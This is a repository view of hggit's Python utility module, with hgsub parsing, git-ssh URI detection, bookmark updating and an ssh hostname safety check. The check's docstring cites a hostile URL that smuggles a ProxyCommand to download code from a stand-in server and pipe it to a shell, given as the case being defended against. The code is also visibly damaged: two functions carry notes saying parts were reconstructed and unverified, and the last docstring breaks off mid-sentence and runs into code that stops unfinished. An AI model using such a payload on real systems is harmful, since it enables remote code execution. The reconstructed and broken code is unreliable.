view hggit/ @ 1102:93cb29247d61

exchange: check for remote refs to determine if we're cloning. The exchange.pull wrapper function was checking whether any paths were configured yet as a proxy to determine whether we're doing the initial clone or a subsequent pull. Core hg @ bdae51a83dfb (released in 4.5) now sets the 'default' path on the ui object before exchange.pull is called, but we can check a bit more directly by checking if we have any remote refs yet. This is the same as a check we do in GitHandler.fetch_pack().
author Kevin Bullock <>
date Sat, 03 Feb 2018 14:54:35 -0600
parents c35751c248c3
children 21264429a8d4
line wrap: on
line source

"""Compatibility functions for old Mercurial versions and other utility
functions."""
import re
import urllib

try:
    from collections import OrderedDict
except ImportError:
    from ordereddict import OrderedDict

from dulwich import errors
from mercurial.i18n import _
from mercurial import (
    error,
    lock as lockmod,
    util as hgutil,
)

# Scheme prefixes checked by isgitsshuri(): a uri that starts with
# '<scheme>://' for any of these is not treated as a git ssh-style uri.
gitschemes = ('git', 'git+ssh', 'git+http', 'git+https')

def parse_hgsub(lines):
    """Fills OrderedDict with hgsub file content passed as list of lines

    Each meaningful line has the form ``name = value``; it is split on the
    first ``=`` only, and both sides are stripped of surrounding whitespace.
    Blank lines and lines whose first non-blank character is ``#`` are
    skipped.  Entries keep the order in which they appear in ``lines``.

    Raises ValueError for a meaningful line that contains no ``=``.
    """
    rv = OrderedDict()
    for l in lines:
        ls = l.strip()
        if not ls or ls[0] == '#':
            # blank line or comment: nothing to record
            continue
        name, value = l.split('=', 1)
        rv[name.strip()] = value.strip()
    return rv

def serialize_hgsub(data):
    """Produces a string from OrderedDict hgsub content

    Emits one newline-terminated ``name = value`` line per entry, in the
    mapping's own iteration order, and returns them concatenated.  An empty
    mapping gives ``''``.
    """
    # items() rather than iteritems(): the latter exists only on Python 2
    # dicts, while items() is available on both Python 2 and Python 3.
    return ''.join('%s = %s\n' % (n, v) for n, v in data.items())

def parse_hgsubstate(lines):
    """Fills OrderedDict with hgsubstate file content passed as list of lines

    Each meaningful line has the form ``value name``; it is split on the
    first space only, so ``name`` may itself contain spaces.  The result
    maps the stripped ``name`` to the stripped ``value``.  Blank lines and
    lines whose first non-blank character is ``#`` are skipped.  Entries
    keep the order in which they appear in ``lines``.

    Raises ValueError for a meaningful line that contains no space.
    """
    rv = OrderedDict()
    for l in lines:
        ls = l.strip()
        if not ls or ls[0] == '#':
            # blank line or comment: nothing to record
            continue
        value, name = l.split(' ', 1)
        rv[name.strip()] = value.strip()
    return rv

def serialize_hgsubstate(data):
    """Produces a string from OrderedDict hgsubstate content

    Walks the keys of ``data`` in sorted order and emits one
    newline-terminated ``value key`` line for each, returning the lines
    concatenated.  An empty mapping gives ``''``.
    """
    entries = []
    for path in sorted(data):
        state = data[path]
        entries.append('%s %s\n' % (state, path))
    return ''.join(entries)

def transform_notgit(f):
    '''use as a decorator around functions that call into dulwich

    The returned wrapper forwards all positional and keyword arguments to
    ``f`` and returns its result.  A dulwich ``NotGitRepository`` error
    raised by ``f`` is re-raised as ``hgutil.Abort('not a git repository')``;
    any other exception propagates unchanged.
    '''
    def inner(*args, **kwargs):
        try:
            return f(*args, **kwargs)
        except errors.NotGitRepository:
            raise hgutil.Abort('not a git repository')
    return inner

def isgitsshuri(uri):
    """Method that returns True if a uri looks like git-style uri

    A "git-style" uri here is the scp-like ``[user@]host:path`` form.
    Anything that starts with ``<scheme>://`` for a scheme in ``gitschemes``,
    or with ``http:`` / ``https:``, is rejected outright.  Otherwise the uri
    is accepted when the part after the host's colon ends in ``.git``, or
    when the host part matches the domain-name pattern used below.

    Tests:

    >>> isgitsshuri('http://example.com/repo.git')
    False
    >>> isgitsshuri('git://example.com/repo.git')
    False
    >>> isgitsshuri('git@example.com:user/repo.git')
    True
    >>> isgitsshuri('git@[2001:db8::1]:repository.git')
    True
    >>> isgitsshuri('relative/path')
    False
    """
    for scheme in gitschemes:
        if uri.startswith('%s://' % scheme):
            return False

    if uri.startswith(('http:', 'https:')):
        return False

    # optional "user@" prefix(es), then a host (optionally bracketed, which
    # allows IPv6 literals), a colon, and the repository path
    m = re.match(r'(?:.+@)*([\[]?[\w\d\.\:\-]+[\]]?):(.*)', uri)
    if m:
        # here we're being fairly conservative about what we consider to be git
        # urls
        giturl, repopath = m.groups()
        # definitely a git repo
        if repopath.endswith('.git'):
            return True
        # use a simple regex to check if it is a fqdn regex
        # NOTE(review): the second half of this pattern was missing from the
        # reviewed copy and has been reconstructed -- confirm against the
        # upstream source before relying on it.
        fqdn_re = (r'(?=^.{4,253}$)(^((?!-)[a-zA-Z0-9-]{1,63}'
                   r'(?<!-)\.)+[a-zA-Z]{2,63}$)')
        if re.match(fqdn_re, giturl):
            return True
    return False

def updatebookmarks(repo, changes, name='git_handler'):
    """abstract writing bookmarks for backwards compatibility

    ``changes`` is an iterable of ``(bookmark, node)`` pairs; a ``node`` of
    None deletes the bookmark, anything else sets it.  ``name`` is the name
    given to the transaction opened for the update.

    The wlock, the lock and the transaction are acquired in that order and
    are always handed to ``lockmod.release`` afterwards, whether or not the
    update succeeded.

    NOTE(review): the try/else/finally skeleton and the statements in the
    ``recordchange`` branches were missing from the reviewed copy and have
    been reconstructed -- confirm against the upstream source.
    """
    bms = repo._bookmarks
    tr = lock = wlock = None
    try:
        wlock = repo.wlock()
        lock = repo.lock()
        tr = repo.transaction(name)
        if hgutil.safehasattr(bms, 'applychanges'):
            # applychanges was added in mercurial 4.3
            bms.applychanges(repo, tr, changes)
        else:
            # older bookmark stores: apply each change by hand; the loop
            # variable is deliberately not called ``name`` so it does not
            # shadow the transaction-name parameter
            for bookmark, node in changes:
                if node is None:
                    del bms[bookmark]
                else:
                    bms[bookmark] = node
            if hgutil.safehasattr(bms, 'recordchange'):
                # recordchange was added in mercurial 3.2
                bms.recordchange(tr)
            else:
                bms.write()
        tr.close()
    finally:
        lockmod.release(tr, lock, wlock)

def checksafessh(host):
    """check if a hostname is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the

    Raises an error.Abort when the url is unsafe.
    host = urllib.unquote(host)
    if host.startswith('-'):
        raise error.Abort(_('potentially unsafe hostname: %r') %